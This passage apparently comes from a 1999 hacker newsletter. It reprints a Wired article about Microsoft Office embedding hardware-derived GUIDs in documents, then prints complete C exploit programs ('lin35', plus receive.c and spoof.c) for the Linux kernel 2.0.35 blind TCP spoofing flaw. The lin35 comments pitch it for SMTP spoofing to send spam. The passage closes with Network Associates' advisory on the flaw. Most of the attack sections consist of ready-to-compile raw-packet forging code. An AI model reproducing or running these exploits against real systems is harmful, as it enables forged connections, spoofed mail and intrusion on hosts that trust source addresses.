  3022.       
  3023.  04.6 Sniffing out MS Security Glitch the GUID (and how to defeat it?)
  3024.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3025.       
  3026.           "If Microsoft starts compelling people to
  3027.                    register, then its going to take a lot of
  3028.                         time for people to disentangle their lives
  3029.                                   from Microsoft's sticky tentacles." 
  3030.             
  3031.       
  3032.       From Wired/ZDNET
  3033.       http://www.wired.com/news/news/technology/story/18331.html
  3034.  
  3035.       Sniffing Out MS Security Glitch
  3036.       by Chris Oakes 
  3037.  
  3038.       5:30 p.m.  8.Mar.99.PST
  3039.       A security vulnerability that hides unique identifiers in Microsoft 
  3040.       Office documents may affect files created by other software 
  3041.       applications, according to the programmer who identified the breach. 
  3042.  
  3043.       Other Office documents and browser cookies, and possibly even software
  3044.       from other companies, can store the unique identity codes, according to 
  3045.       Richard Smith, president of Phar Lap Software in Cambridge, Massachusetts,
  3046.       who first reported the security glitch on Sunday. 
  3047.  
  3048.       Smith discovered that Excel and Word applications fingerprint files with 
  3049.       an identifying number. That number is used by the hardware that connects
  3050.       a PC to a local area network. The 32-digit numbers were designed long 
  3051.       ago by developers of networking hardware to identify individual machines. 
  3052.  
  3053.       "These things are slippery. These [numbers] are floating around -- it's 
  3054.       hard to say where they're showing up," said Smith. Microsoft was not 
  3055.       available for comment. The identifying number is trapped in the Windows
  3056.       registry file as a Globally Unique Identifier, or GUID, and embedded in a
  3057.       hidden part of documents created using Office, including Word, Excel, and
  3058.       PowerPoint. 
  3059.  
  3060.       "I got email for someone mentioning that GUIDs are also put in Web-browser
  3061.       cookies. I did a quick scan on my Netscape cookies file and found a number
  3062.       of Web sites that were indeed using GUIDs for identification purposes," 
  3063.       Smith said. It goes to show the ubiquity of the ID numbers, he said. 
  3064.       "Anyone writing applications can use them. [The privacy issue] is an 
  3065.       unintended side effect." The unique number can be easily traced to a person
  3066.       by searching for the number in documents known to be created by that person,
  3067.       according to Smith.
  3068.       
  3069.       Unknown documents could also be associated with that person using the 
  3070.       identification number. "If you're in some really weird office-politics
  3071.       situation -- who knows?" he said. He plans to explore whether other   
  3072.       Windows applications, such as software for creating Web pages, use the ID
  3073.       numbers. He's also interested in the behavior of the company's Outlook email
  3074.       software. 
  3075.  
  3076.       Smith said users can easily find their own network address, then search their
  3077.       hard-disk content for documents containing the ID number to determine
  3078.       where it is surreptitiously stored. Users can find the number by selecting
  3079.       the Run command under the Windows Start menu and typing winipcfg to launch
  3080.       the Windows IP configuration utility. One of the fields appearing in the 
  3081.       dialog box contains the user's "network adapter" address. 
  3082.  
  3083.       "All I did was have a search utility scan the hard disk for occurrences of 
  3084.       the Ethernet address," he said. Smith used one called Grep. "Anyone can do 
  3085.       that and see how common it is." 
  3086.  
  3087.       Certain types of text editors, known as hexadecimal editors, will reveal the
  3088.       invisible code in any file. One example of the editor is HexEdit. Smith made
  3089.       a related discovery when he found Microsoft was collecting the identification
  3090.       number users entered when registering their new copies of the company's 
  3091.       Windows 98 operating system, prompting Microsoft to post an open letter to 
  3092.       its customers. 
  3093.  
  3094.       It said the company would publish software to remove the ID number from users'
  3095.       Windows registry file, a move designed to prevent the behavior from occurring 
  3096.       in future documents. The company also said a subsequent update of Windows 98
  3097.       would disable the software's registration feature so that the hardware ID would
  3098.       not be collected "unless the user checks the option to send hardware information 
  3099.       to Microsoft." The company said it also plans to post a software tool on its Web
  3100.       site that will allow users to delete hardware-registration information from
  3101.       the Windows registry. But in a privacy advisory also issued Monday, a
  3102.       privacy-watchdog group demanded that Microsoft go further. 
  3103.  
  3104.       "What I think is unprecedented here is that the problem is now on billions of
  3105.       documents around the world. The problem remains out there even if Microsoft 
  3106.       fixed the applications," said Jason Catlett, president of Junkbusters. 
  3107.       "We demand they publish and publicize free software to protect these files -- 
  3108.       and that's not  something Microsoft in its open letter said it would do. 
  3109.  
  3110.       "[Users] really don't have an effective means of stopping [the problem] from
  3111.       happening short of switching to [another software product like] Corel
  3112.       WordPerfect," he said. Smith and privacy advocates worry that Microsoft 
  3113.       already has built up a database of registration numbers, although the company
  3114.       said it plans to purge its own databases of any hardware-identification
  3115.       information that may have been inadvertently gathered without customers' 
  3116.       consent. 
  3117.  
  3118.       Microsoft said it was confident "that the hardware information is not being 
  3119.       stored in our marketing databases, and we are investigating whether it is
  3120.       stored in any database at all within Microsoft." Catlett believes an 
  3121.       independent auditor should oversee any such effort to purge the data, which
  3122.       could have been transferred to backup systems or related databases. 
  3123.  
  3124.       "For me, the bottom line is Microsoft is getting information off of people's
  3125.       computer [that] they have no business getting." Addressing that issue, he 
  3126.       said, "sounds like a patch to me." Catlett is disturbed by this wide-reaching
  3127.       impact. Combined with Microsoft's push for required registration, a possibility
  3128.       Catlett documented last week, he sees a quagmire for users trying to protect
  3129.       themselves. 
  3130.  
  3131.       "If Microsoft starts compelling people to register, then its going to take a 
  3132.       lot of time for people to disentangle their lives from Microsoft's sticky
  3133.       tentacles." 
  3134.       
  3135.       
  3136.       And From HNN March 12th:
  3137.       
  3138.       contributed by spitfire 
  3139.       Are you worried about the Microsoft Global Unique Identifier? You know, that
  3140.       number that is based on your MAC address, is embedded in all your documents 
  3141.       and is transmitted to Redmond whenever you visit the Microsoft web site or 
  3142.       register a product? Well Vector Development claims to have the solution, 
  3143.       Guideon.
  3144.       
  3145.       Guideon claims to replace the GUID string with zeros or an optional string
  3146.       you choose. <sounds interesting, I could think of some choice strings,
  3147.       to replace the GUID with ... *grin* -Ed >
  3148.  
  3149.       Vector Development http://www.vecdev.com/guideon.html
  3150.       
  3151.       
  3152.       @HWA
  3153.       
  3154.  
  3155.  05.0 Linux TCP flaw exploit code for Linux 2.0.35 and older.
  3156.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3157.  
  3158.       /* linux 2.0.35 and older
  3159.        * tcp flaw exploit (discovered by network associates, october 1998)
  3160.        * by scut (990310)
  3161.        *
  3162.        * description: linux does send the tcp data received in the SYN_RECEIVED
  3163.        *              state if a FIN packet is send
  3164.        * affect: blind spoofing on linux systems with kernel version below 2.0.35
  3165.        * useful for: SMTP spoofing (for the lamers to spam)
  3166.        *             FTP/Telnet spoofing
  3167.        * for the lamers: no, you cannot spoof your mIRC with this
  3168.        *
  3169.        * for compilation you need libnet, a low level network library from route,
  3170.        * go to http://www.infonexus.com/~daemon9/
  3171.        * then try with:
  3172.        *
  3173.        *  gcc -o lin35 lin35.c -lnet -D_BSD_SOURCE=1
  3174.        */
  3175.       
  3176.       #include <stdio.h>
  3177.       #include <stdlib.h>
  3178.       #include <unistd.h>
  3179.       #include <sys/time.h>
  3180.       #include <libnet.h>
  3181.       
  3182.       int
  3183.       main(int argc, char **argv)
  3184.       {
  3185.         u_long  dip = 0;
  3186.         u_long  sip = 0;
  3187.         u_short  dp = 0;
  3188.         u_short  sp = 0;
  3189.         u_long  seq;
  3190.         u_char  *buf, *fbuf;
  3191.         int  c, s, fp;
  3192.         unsigned long int  fs;
  3193.       
  3194.         printf("lin35 - linux < 2.0.35 spoofer by sc!\n");
  3195.         if (argc != 7) {
  3196.           printf("usage: %s shost sport dhost dport delay file\n", argv[0]);
  3197.           printf("  shost = source host (name or ip)\n");
  3198.           printf("  sport = source port\n");
  3199.           printf("  dhost = destination host\n");
  3200.           printf("  dport = destination port\n");
  3201.           printf("  delay = time to wait (in ms) between SYN and data and FIN\n");
  3202.           printf("  file = filename to read data from\n");
  3203.           exit(0);
  3204.         }
  3205.         sip = name_resolve(argv[1], 1);
  3206.         sp = atoi(argv[2]);
  3207.         dip = name_resolve(argv[3], 1);
  3208.         dp = atoi(argv[4]);
  3209.       
  3210.         fp = open(argv[6], O_RDONLY);
  3211.         if (fp == -1) {
  3212.           fprintf(stderr, "file not found\n");
  3213.           exit(1);
  3214.         }
  3215.         fs = lseek(fp, 0, SEEK_END);
  3216.         if (fs == -1) {
  3217.           fprintf(stderr, "file end not found\n");
  3218.           exit(1);
  3219.         }
  3220.         if (lseek(fp, 0, SEEK_SET) == -1) {
  3221.           fprintf(stderr, "cannot reset offset\n");
  3222.           exit(1);
  3223.         }
  3224.         printf("[35] data file: %s - file size: %u\n", argv[6], fs);
  3225.         if (fs > (MAX_PACKET - (IP_H + TCP_H))) {
  3226.           fprintf(stderr, "file too big, exiting\n");
  3227.           exit(1);
  3228.         }
  3229.         fbuf = malloc(fs);
  3230.         if (fbuf == NULL) {
  3231.           fprintf(stderr, "cannot load file to mem\n");
  3232.           exit(1);
  3233.         }
  3234.         c = read(fp, fbuf, fs);
  3235.         if (c != fs) {
  3236.           fprintf(stderr, "cannot read file\n");
  3237.           exit(1);
  3238.         }
  3239.       
  3240.         buf = calloc(1, TCP_H + IP_H);
  3241.         if (buf == NULL) {
  3242.           fprintf(stderr, "no memory for packet\n");
  3243.           exit(1);
  3244.         }
  3245.         s = open_raw_sock(IPPROTO_RAW);
  3246.         if (s == -1) {
  3247.           fprintf(stderr, "cannot open raw socket\n");
  3248.           exit(1);
  3249.         }
  3250.       
  3251.         seq = get_prand(PRu32);
  3252.       
  3253.         /* first initiate a connection */
  3254.         printf("[35] opening connection, sending SYN\n");
  3255.         build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
  3256.                  sip, dip, NULL, 0, buf);
  3257.         build_tcp(sp, dp, seq, 0, TH_SYN, 16384, 0, NULL, 0, buf + IP_H);
  3258.         do_checksum(buf, IPPROTO_TCP, TCP_H);
  3259.         c = write_ip(s, buf, TCP_H + IP_H);
  3260.         if (c < TCP_H + IP_H) {
  3261.           fprintf(stderr, "send to less bytes\n");
  3262.           exit(1);
  3263.         }
  3264.       
  3265.         /* now wait to let the connection establish */
  3266.         usleep(atoi(argv[5]) * 1000);
  3267.       
  3268.         /* then send data packet */
  3269.         printf("[35] sending data packet (%u bytes of data)\n", fs);
  3270.         buf = realloc(buf, TCP_H + IP_H + fs);
  3271.         if (buf == NULL) {
  3272.           fprintf(stderr, "memory\n");
  3273.           exit(1);
  3274.         }
  3275.         build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
  3276.                  sip, dip, NULL, 0, buf);
  3277.         build_tcp(sp, dp, seq + 1, 0, 0, 16384, 0, fbuf, fs, buf + IP_H);
  3278.         do_checksum(buf, IPPROTO_TCP, TCP_H);
  3279.         c = write_ip(s, buf, TCP_H + IP_H + fs);
  3280.         if (c < (TCP_H + IP_H + fs)) {
  3281.           fprintf(stderr, "send to less bytes (%d) for data packet\n", c);
  3282.           exit(1);
  3283.         }
  3284.       
  3285.         /* now wait again */
  3286.         usleep(atoi(argv[5]) * 1000);
  3287.       
  3288.         /* and close the connection */
  3289.         printf("[35] closing connection, sending FIN\n");
  3290.         build_ip(TCP_H, 0, get_prand(PRu16), 0, get_prand(PR8), IPPROTO_TCP,
  3291.                  sip, dip, NULL, 0, buf);
  3292.         build_tcp(sp, dp, seq + 1 + fs, 0, TH_FIN, 16384, 0, NULL, 0, buf + IP_H);
  3293.         do_checksum(buf, IPPROTO_TCP, TCP_H);
  3294.         c = write_ip(s, buf, TCP_H + IP_H);
  3295.         if (c < TCP_H + IP_H) {
  3296.           fprintf(stderr, "send to less bytes\n");
  3297.           exit(1);
  3298.         }
  3299.         printf("[35] successful\n");
  3300.         free(fbuf);
  3301.         free(buf);
  3302.         return(0);
  3303.       }
  3304.       
  3305.       @HWA
  3306.  
  3307.  05.1 TCP Blind Spoofing Exploit Code for Linux kernels 2.0.35< and Discussion
  3308.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3309.       
  3310.       -=- receive.c and spoof.c exploit code
  3311.       
  3312.       Hello,
  3313.  
  3314.       Here is some demonstration code for the "Linux Blind TCP Spoofing" problem
  3315.       discovered by Network Associates, Inc. If you have trouble compiling this,
  3316.       try it with -D_BSD_SOURCE.
  3317.       
  3318.       1.) receive.c
  3319.       
  3320.       This simple program creates a TCP socket and waits for a connection.
  3321.       After the accept call returnes, it reads 8 bytes from the socket and
  3322.       prints them on stdout.
  3323.       
  3324.       usage: receive listen_port
  3325.       
  3326.       2.) spoof.c
  3327.       
  3328.       This one sends a SYN packet, a Null packet (no flags at all) with 8 bytes
  3329.       of data and a FIN packet to the target.
  3330.       
  3331.       usage: spoof source_ip source_port target_ip target_port
  3332.       
  3333.       Don't forget to disable host source_ip so it cannot send RST's. I've tested
  3334.       this on Linux 2.0.30. After the FIN packet is received, the accept call
  3335.       returnes and the read call gives the data sent with the Null packet.
  3336.       
  3337.       !!This code is for educational purposes only!!
  3338.       
  3339.       ---------------------------- receive.c --------------------------
  3340.       #include <stdio.h>
  3341.       #include <errno.h>
  3342.       #include <sys/socket.h>
  3343.       #include <unistd.h>
  3344.       #include <stdlib.h>
  3345.       #include <netinet/in.h>
  3346.       
  3347.       main(int argc, char *argv[])
  3348.       {
  3349.        int i,n,dummy,new;
  3350.        struct sockaddr_in address,source_addr;
  3351.        char buffer[8];
  3352.       
  3353.        address.sin_family = AF_INET;
  3354.        address.sin_port = htons(atoi(argv[1]));
  3355.        address.sin_addr.s_addr = 0;
  3356.       
  3357.        if((i=socket(AF_INET,SOCK_STREAM,6))<0)   /*create socket*/
  3358.         {
  3359.          perror("socket\n");
  3360.          exit(1);
  3361.         }
  3362.        if((bind(i,(struct sockaddr *)&address,sizeof(struct sockaddr_in)))<0)
  3363.          {                                                /*bind socket to address*/
  3364.           perror("bind");
  3365.           exit(1);
  3366.          }
  3367.        if((listen(i,2))<0)
  3368.          {
  3369.           perror("listen");
  3370.           exit(1);
  3371.          }
  3372.        printf("listening on socket\n");
  3373.        new=accept(i,(struct sockaddr *)&source_addr,&dummy);
  3374.        if(new>0)
  3375.          printf("connected!\n");
  3376.        else
  3377.         {
  3378.          perror("accept");
  3379.          exit(1);
  3380.         }
  3381.        fflush(stdout);
  3382.        n=read(new,buffer,8);
  3383.        printf("read %i bytes from socket\n",n);
  3384.        printf("message is: %s\n",buffer);
  3385.       }
  3386.       
  3387.       --------------------------------spoof.c---------------------------------
  3388.       #include <stdio.h>
  3389.       #include <netinet/ip.h>
  3390.       #include <sys/socket.h>
  3391.       #include <arpa/inet.h>
  3392.       #include <netinet/tcp.h>
  3393.       #include <stdlib.h>
  3394.       #include <errno.h>
  3395.       #include <sys/types.h>
  3396.       #include <asm/types.h>
  3397.       
  3398.       #define FIN 1
  3399.       #define SYN 2
  3400.       #define SEQ 20985
  3401.       
  3402.       /*---------------Checksum calculation--------------------------------*/
  3403.       unsigned short in_cksum(unsigned short *addr,int len)
  3404.       {
  3405.        register int nleft = len;
  3406.        register unsigned short *w = addr;
  3407.        register int sum = 0;
  3408.        unsigned short answer = 0;
  3409.       
  3410.        while (nleft > 1)
  3411.               {
  3412.               sum += *w++;
  3413.               nleft -= 2;
  3414.               }
  3415.        if (nleft == 1)
  3416.               {
  3417.               *(u_char *)(&answer) = *(u_char *)w ;
  3418.               sum += answer;
  3419.               }
  3420.        sum = (sum >> 16) + (sum & 0xffff);
  3421.        sum += (sum >> 16);
  3422.        answer = ~sum;
  3423.        return(answer);
  3424.       }
  3425.       /*----------------------------------------------------------------------*/
  3426.       
  3427.       /*------------Send spoofed TCP packet-----------------------------------*/
  3428.       int send_tcp(int sfd,unsigned int src,unsigned short src_p,
  3429.                    unsigned int dst,unsigned short dst_p,tcp_seq seq,tcp_seq ack,
  3430.                    u_char flags,char *buffer,int len)
  3431.       {
  3432.        struct iphdr ip_head;
  3433.        struct tcphdr tcp_head;
  3434.        struct sockaddr_in target;
  3435.        char packet[2048];     /*the exploitation of this is left as an exercise..*/
  3436.        int i;
  3437.       
  3438.        struct tcp_pseudo        /*the tcp pseudo header*/
  3439.        {
  3440.         __u32 src_addr;
  3441.         __u32 dst_addr;
  3442.         __u8  dummy;
  3443.         __u8  proto;
  3444.         __u16 length;
  3445.        } pseudohead;
  3446.       
  3447.        struct help_checksum   /*struct for checksum calculation*/
  3448.        {
  3449.         struct tcp_pseudo pshd;
  3450.         struct tcphdr tcphd;
  3451.         char tcpdata[1024];
  3452.        } tcp_chk_construct;
  3453.       
  3454.       
  3455.        /*Prepare IP header*/
  3456.        ip_head.ihl      = 5;     /*headerlength with no options*/
  3457.        ip_head.version  = 4;
  3458.        ip_head.tos      = 0;
  3459.        ip_head.tot_len  = htons(sizeof(struct iphdr)+sizeof(struct tcphdr)+len);
  3460.        ip_head.id       = htons(31337 + (rand()%100));
  3461.        ip_head.frag_off = 0;
  3462.        ip_head.ttl      = 255;
  3463.        ip_head.protocol = IPPROTO_TCP;
  3464.        ip_head.check    = 0;    /*Fill in later*/
  3465.        ip_head.saddr    = src;
  3466.        ip_head.daddr    = dst;
  3467.        ip_head.check    = in_cksum((unsigned short *)&ip_head,sizeof(struct iphdr));
  3468.       
  3469.        /*Prepare TCP header*/
  3470.        tcp_head.th_sport = htons(src_p);
  3471.        tcp_head.th_dport = htons(dst_p);
  3472.        tcp_head.th_seq   = htonl(seq);
  3473.        tcp_head.th_ack   = htonl(ack);
  3474.        tcp_head.th_x2    = 0;
  3475.        tcp_head.th_off   = 5;
  3476.        tcp_head.th_flags = flags;
  3477.        tcp_head.th_win   = htons(0x7c00);
  3478.        tcp_head.th_sum   = 0;  /*Fill in later*/
  3479.        tcp_head.th_urp   = 0;
  3480.       
  3481.        /*Assemble structure for checksum calculation and calculate checksum*/
  3482.        pseudohead.src_addr=ip_head.saddr;
  3483.        pseudohead.dst_addr=ip_head.daddr;
  3484.        pseudohead.dummy=0;
  3485.        pseudohead.proto=ip_head.protocol;
  3486.        pseudohead.length=htons(sizeof(struct tcphdr)+len);
  3487.       
  3488.        tcp_chk_construct.pshd=pseudohead;
  3489.        tcp_chk_construct.tcphd=tcp_head;
  3490.        memcpy(tcp_chk_construct.tcpdata,buffer,len);
  3491.       
  3492.        tcp_head.th_sum=in_cksum((unsigned short *)&tcp_chk_construct,
  3493.                                sizeof(struct tcp_pseudo)+sizeof(struct tcphdr)+len);
  3494.       
  3495.        /*Assemble packet*/
  3496.        memcpy(packet,(char *)&ip_head,sizeof(ip_head));
  3497.        memcpy(packet+sizeof(ip_head),(char *)&tcp_head,sizeof(tcp_head));
  3498.        memcpy(packet+sizeof(ip_head)+sizeof(tcp_head),buffer,len);
  3499.       
  3500.        /*Send packet*/
  3501.        target.sin_family     = AF_INET;
  3502.        target.sin_addr.s_addr= ip_head.daddr;
  3503.        target.sin_port       = tcp_head.th_dport;
  3504.        i=sendto(sfd,packet,sizeof(struct iphdr)+sizeof(struct tcphdr)+len,0,
  3505.                           (struct sockaddr *)&target,sizeof(struct sockaddr_in));
  3506.        if(i<0)
  3507.          return(-1); /*Error*/
  3508.        else
  3509.          return(i); /*Return number of bytes sent*/
  3510.       }
  3511.       /*---------------------------------------------------------------------*/
  3512.       
  3513.       main(int argc, char *argv[])
  3514.       {
  3515.        int i;
  3516.        unsigned int source,target;
  3517.        unsigned short int s_port,d_port;
  3518.        char data[]="abcdefg";
  3519.       
  3520.        source=inet_addr(argv[1]);
  3521.        s_port=atoi(argv[2]);
  3522.        target=inet_addr(argv[3]);
  3523.        d_port=atoi(argv[4]);
  3524.       
  3525.        if((i=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0)  /*open sending socket*/
  3526.         {
  3527.          perror("socket");
  3528.          exit(1);
  3529.         }
  3530.        send_tcp(i,source,s_port,target,d_port,SEQ,0,SYN,NULL,0);
  3531.        printf("SYN sent\n");
  3532.        usleep(1000);
  3533.        send_tcp(i,source,s_port,target,d_port,SEQ+1,0,0,data,8); /*no flags set*/
  3534.        printf("data sent\n");
  3535.        usleep(1000);
  3536.        send_tcp(i,source,s_port,target,d_port,SEQ+9,0,FIN,NULL,0);
  3537.        printf("FIN sent\n");
  3538.        close(i);
  3539.       }
  3540.       
  3541.       --
  3542.       Jochen Bauer
  3543.       Institute for Theoretical Physics
  3544.       University of Stuttgart
  3545.       Germany
  3546.       
  3547.       PGP public key available from:
  3548.       http://www.theo2.physik.uni-stuttgart.de/jtb.html
  3549.       
  3550.       
  3551.       
  3552.       
  3553.       -=- further discussion;
  3554.       
  3555.       
  3556.       Date: Tue, 9 Mar 1999 16:28:24 -0800
  3557.       From: Security Research Labs <seclabs@NAI.COM>
  3558.       To: BUGTRAQ@netspace.org
  3559.       Subject: Linux Blind TCP Spoofing
  3560.       
  3561.           [ The following text is in the "iso-8859-1" character set. ]
  3562.           [ Your display is set for the "US-ASCII" character set.  ]
  3563.           [ Some characters may be displayed incorrectly. ]
  3564.       
  3565.       -----BEGIN PGP SIGNED MESSAGE-----
  3566.       Hash: SHA1
  3567.       
  3568.       ======================================================================
  3569.       =
  3570.       
  3571.                               Network Associates, Inc.
  3572.                                  SECURITY ADVISORY
  3573.                                   March 9, 1999
  3574.       
  3575.                               Linux Blind TCP Spoofing
  3576.       
  3577.       ======================================================================
  3578.       =
  3579.       
  3580.       SYNOPSIS
  3581.       
  3582.       An implementation flaw in the Linux TCP/IP stack allows remote
  3583.       attackers
  3584.       to forge TCP connections without predicting sequence numbers and pass
  3585.       
  3586.       data to the application layer before a connection is established.
  3587.       
  3588.       ======================================================================
  3589.       =
  3590.       
  3591.       VULNERABLE HOSTS
  3592.       
  3593.       This problem is present in Linux kernels up to and including 2.0.35.
  3594.       Any distribution containing a kernel revision less than this is
  3595.       vulnerable.
  3596.       
  3597.       ======================================================================
  3598.       =
  3599.       
  3600.       DETAILS
  3601.       
  3602.       TCP is a reliable connection-oriented protocol which requires the
  3603.       completion of a three way handshake to establish a connection. To
  3604.       implement reliable and unduplicated delivery of data, the TCP
  3605.       protocol
  3606.       uses a sequence based acknowledgment system. During connection
  3607.       establishment each host selects an initial sequence number which is
  3608.       sent in the first packet of the connection. Each subsequent byte
  3609.       transmitted in the TCP connection is assigned a sequence number.
  3610.       
  3611.       To prevent duplicate or invalid segments from impacting established
  3612.       connections TCP utilizes a state based model. In a typical
  3613.       client-server application, the client initiates a connection by
  3614.       transmitting a TCP segment to a listening server process. This
  3615.       causes the state of the process to move from the LISTEN state into
  3616.       SYN_RECEIVE if a SYN flag is present. During this state the server
  3617.       acknowledges the clients request setting both the SYN and ACK
  3618.       flags. To complete the three way handshake the client acknowledges
  3619.       the servers response, moving the server from SYN_RECEIVE to
  3620.       ESTABLISHED state.
  3621.       
  3622.       To establish a forged TCP session an attacker must have knowledge
  3623.       of or be able to predict the initial sequence number that is selected
  3624.       by the server. An implementation flaw in the Linux kernel allows
  3625.       data to be delivered to the application layer before the handshake
  3626.       has completed.
  3627.       
  3628.       
  3629.       ======================================================================
  3630.       =
  3631.       
  3632.       TECHNICAL DETAILS
  3633.       
  3634.       The combination of three flaws in the Linux TCP/IP implementation
  3635.       contribute to the existence of a security vulnerability. Firstly,
  3636.       Linux only verifies the acknowledgment number of incoming segments
  3637.       if the ACK flag has been set. Linux also queues data from TCP
  3638.       segments without acknowledgment information prior to the
  3639.       completion of the three way handshake but after the initial SYN
  3640.       has been acknowledged by the server. Finally, Linux passes data to
  3641.       the application layer upon the receipt of a packet containing the
  3642.       FIN flag regardless of whether a connection has been established.
  3643.       Together, these flaws allow an attacker to spoof an arbitrary
  3644.       connection and deliver data to an application without the need to
  3645.       predict the servers initial sequence number.
  3646.       
  3647.       According to the standard, there is only one case wherein a correct
  3648.       TCP/IP stack can accept data in a packet that does not have the ACK
  3649.       flag set --- the initial connection-soliciting SYN packet can
  3650.       contain data, but must not have the ACK flag set. In any other case,
  3651.       a data packet not bearing the ACK flag should be discarded.
  3652.       
  3653.       When a TCP segment carries an ACK flag, it must have a correct
  3654.       acknowledgement sequence number (which is the sequence number of the
  3655.       next byte of data expected from the other side of the connection).
  3656.       TCP packets bearing the ACK flag are verified to ensure that their
  3657.       acknowledgement numbers are correct.
  3658.       
  3659.       Vulnerable Linux kernels accept data segments that do not have the
  3660.       ACK flag set. Because the ACK flag is not set, the acknowledgement
  3661.       sequence number is not verified. This allows an attacker to send
  3662.       data over a spoofed connection without knowing the target's current
  3663.       (or initial)  sequence number.
  3664.       
  3665.       Linux does not deliver data received from a TCP connection when the
  3666.       connection is in SYN_RECEIVE state. Thus, an attacker cannot
  3667.       successfully spoof a TCP transaction to a Linux host without somehow
  3668.       completing the TCP handshake. However, an implementation flaw in
  3669.       some Linux kernels allows an attacker to bypass the TCP handshake
  3670.       entirely, by "prematurely" closing it with a FIN packet.
  3671.       
  3672.       When a FIN packet is received for a connection in SYN_RECEIVE state,
  3673.       Linux behaves as if the connection was in ESTABLISHED state and moves
  3674.       
  3675.       the connection to CLOSE_WAIT state. In the process of doing this,
  3676.       data queued on the connection will be delivered to listening
  3677.       applications. If the ACK flag is not set on the FIN segment, the
  3678.       target's sequence number is not verified in the segment.
  3679.       
  3680.       
  3681.       ======================================================================
  3682.       =
  3683.       
  3684.       RESOLUTION
  3685.       
  3686.       It is recommended that kernels below version 2.0.36 be upgraded to
  3687.       eliminate this vulnerability.
  3688.       
  3689.       Updated kernel packages for Red Hat Linux which are not vulnerable to
  3690.       this
  3691.       problem are available from
  3692.       http://www.redhat.com/support/docs/errata.html.
  3693.       
  3694.       Both Debian and Caldera Linux have been contacted regarding this
  3695.       vulnerability although no official response has been received.
  3696.       
  3697.       The latest stable versions of the Linux kernel are available from
  3698.       http://www.kernel.org.
  3699.       
  3700.       ======================================================================
  3701.       =
  3702.       
  3703.       CREDITS
  3704.       
  3705.       Analysis and documentation of this problem was conducted by Anthony
  3706.       Osborne with the Security Labs at Network Associates. This
  3707.       vulnerability
  3708.       was discovered on the October 5, 1998.
  3709.       
  3710.       ======================================================================
  3711.       =
  3712.       
  3713.       ABOUT THE NETWORK ASSOCIATES SECURITY LABS
  3714.       
  3715.       The Security Labs at Network Associates hosts some of the most
  3716.       important
  3717.       research in computer security today. With over 30 published security
  3718.       advisories published in the last 2 years, the Network Associates
  3719.       security
  3720.       auditing teams have been responsible for the discovery of many of the
  3721.       Internet's most serious security flaws. This advisory represents our
  3722.       ongoing commitment to provide critical information to the security
  3723.       community.
  3724.       
  3725.       For more information about the Security Labs at Network Associates,
  3726.       see our website at http://www.nai.com or contact us at
  3727.       <seclabs@nai.com>.
  3728.       
  3729.       ======================================================================
  3730.       =
  3731.       
  3732.       NETWORK ASSOCIATES SECURITY LABS PGP KEY
  3733.       
  3734.       - -----BEGIN PGP PUBLIC KEY BLOCK-----
  3735.       Version: PGP 5.5.5
  3736.       
  3737.       mQGiBDXGgDsRBADVOnID6BtEhKlm2cNalho28YP0JAh+J4iRUIaiWshzI0tc0KPc
  3738.       fvs+0xYwiqjxmeHi2sdIEPQ7S+ltA3Dlp6/DFojWBr2XB9hfWy4uiKBUHqnsKYnB
  3739.       Gpkh6nIx7DIwn+u0PXMXbJCG3LYf8daiPVdzC2VFtbRvJL4wZc6NLQViFQCg/9uS
  3740.       DuH/0NE6mO8Cu4iVrUT5Wk8D/ArOpV5T5yIuXHZO1/ZBVeHccVVvHe8wHK4D9WUs
  3741.       FsB8fgYLNgdFMMjtam7QQSBY/P1KKBzaFqZhkfS4WVMAFEy94NHXG+KTCPhXkZzp
  3742.       OPPqwWqZgfvOg0Bm20O/GhzQkB6JfFJqcfR87Ej0+fcDKrTTxAELWHGS7c9Qdn6P
  3743.       bfwHA/4oLNwYrtgWNkjGcG018Pu2jKT7YuP9zBTMu28IBiWdPLGL9Wle4d5cdDVx
  3744.       Es4iVl8FMtxlgTWCgMnBLS4nyM3pCn1HF+8Gi+IVKUXWCkqt/rtBMsrOMfrOgEIu
  3745.       BWnTZcTR7kcWtH7xDFNyZ47U4pElLXwATVDty/FczAJnpeht2LQyTmV0d29yayBB
  3746.       c3NvY2lhdGVzIFNlY3VyaXR5IExhYnMgPHNlY2xhYnNAbmFpLmNvbT6JAEsEEBEC
  3747.       AAsFAjXGgDsECwMCAQAKCRCheCy6j9WBEtgDAKDpYMwQZP0Ipx7X0ivnTxxJkA/W
  3748.       vACg4LZv0lmWqmnd7XCe4OIJ05aT6hK5Ag0ENcaAOxAIAPZCV7cIfwgXcqK61qlC
  3749.       8wXo+VMROU+28W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh
  3750.       01D49Vlf3HZSTz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscB
  3751.       qtNbno2gpXI61Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFst
  3752.       jvbzySPAQ/ClWxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISn
  3753.       CnLWhsQDGcgHKXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVeky
  3754.       CzsAAgIH/RZcJoRkhCf9O4Er+rciBNG3QqM3tek23oxGuVwqRxtGlGKuf+YaUDIA
  3755.       vZhARftupZYJf/+AM9pyjjsF7ON/Df5oIXXhqzrDySw47dNB3I1FG7vwAUBRfYgG
  3756.       NRP+zvf1nld+FgAXag1DIQteXYPtoMUJP8ZgvbELYVdZS2TapOHUv7r4rOY+UUjl
  3757.       U+FkQPp9KCNreaNux4NxwT3tzXl1KqqkliC8sYxvMCkJ+JO71TKGplO9dXsf3O8p
  3758.       2r33+LngmLs4O7inrUlmAUKq3jmCK50J7RsZjd6PlK/0JwcjFkOZeYrxTguZzCR4
  3759.       QYmo8nEHqEMSKQci0VUf9KH4lHf6xmGJAEYEGBECAAYFAjXGgDsACgkQoXgsuo/V
